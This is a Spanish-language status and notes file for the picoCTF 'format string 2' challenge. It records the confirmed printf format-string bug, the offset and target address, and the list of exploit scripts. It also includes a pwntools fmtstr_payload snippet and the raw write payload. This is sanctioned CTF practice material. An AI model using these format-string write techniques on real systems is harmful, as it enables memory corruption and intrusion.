╔═══════════════════════════════════════════════════════════╗
║         FORMAT STRING 2 - ESTADO Y PRÓXIMOS PASOS         ║
╚═══════════════════════════════════════════════════════════╝

PROBLEMA ACTUAL:
════════════════
La instancia del challenge EXPIRÓ. El servidor no responde.

DEBES HACER ESTO AHORA:
══════════════════════
1. Ve a picoCTF 
2. Busca el challenge "format string 2"
3. Haz clic en "Launch Instance" o "Relaunch Instance"
4. Anota el nuevo puerto (probablemente será diferente de 58421)
5. Actualiza el archivo EXPLOIT_DEFINITIVO.py con el nuevo puerto

ANÁLISIS COMPLETADO:
═══════════════════
✓ Vulnerabilidad confirmada: format string en printf(buf)
✓ Objetivo: cambiar sus (0x404060) de 0x21737573 a 0x67616c66
✓ Offset del buffer: 14 (confirmado)
✓ Problema: scanf("%s") bloquea null bytes en direcciones

SCRIPTS LISTOS:
═══════════════
1. EXPLOIT_DEFINITIVO.py - Prueba múltiples técnicas automáticamente
2. exploit_offsets.py - Brute force de offsets específicos
3. exploit_mega.py - Versión alternativa

PARA EJECUTAR CUANDO TENGAS NUEVA INSTANCIA:
═══════════════════════════════════════════

Opción 1 (Recomendada):
    cd /workspace/format_string_2_ctf
    # Editar EXPLOIT_DEFINITIVO.py línea 13 con nuevo puerto
    python3 EXPLOIT_DEFINITIVO.py

Opción 2 (Manual con pwntools):
    from pwn import *
    r = remote("rhea.picoctf.net", NUEVO_PUERTO)
    r.recvuntil(b'What do you have to say?\n')
    payload = fmtstr_payload(14, {0x404060: 0x67616c66})
    r.sendline(payload)
    print(r.recvall().decode())

Opción 3 (Brute force offsets):
    python3 exploit_offsets.py

TEORÍA DE LA SOLUCIÓN:
══════════════════════
pwntools fmtstr_payload() DEBERÍA funcionar con:
- Offset: 14
- write_size: 'byte' o 'short'
- Target: {0x404060: 0x67616c66}

Aunque scanf() se detiene en null bytes, pwntools genera un payload
que coloca las direcciones estratégicamente para que printf() pueda
procesarlas correctamente.

EL PAYLOAD SE VE ASÍ:
═════════════════════
%97c%24$hhn%5c%25$hhnc%26$hhn%5c%27$hhnab@@\x00`@@\x00c@@\x00a@@\x00

- Formato (sin nulls): procesado por printf
- Direcciones (con nulls al final): referenciadas por offsets $24,$25,$26,$27

ESTADO: LISTO PARA EJECUTAR CUANDO TENGAS SERVIDOR ACTIVO
═══════════════════════════════════════════════════════════
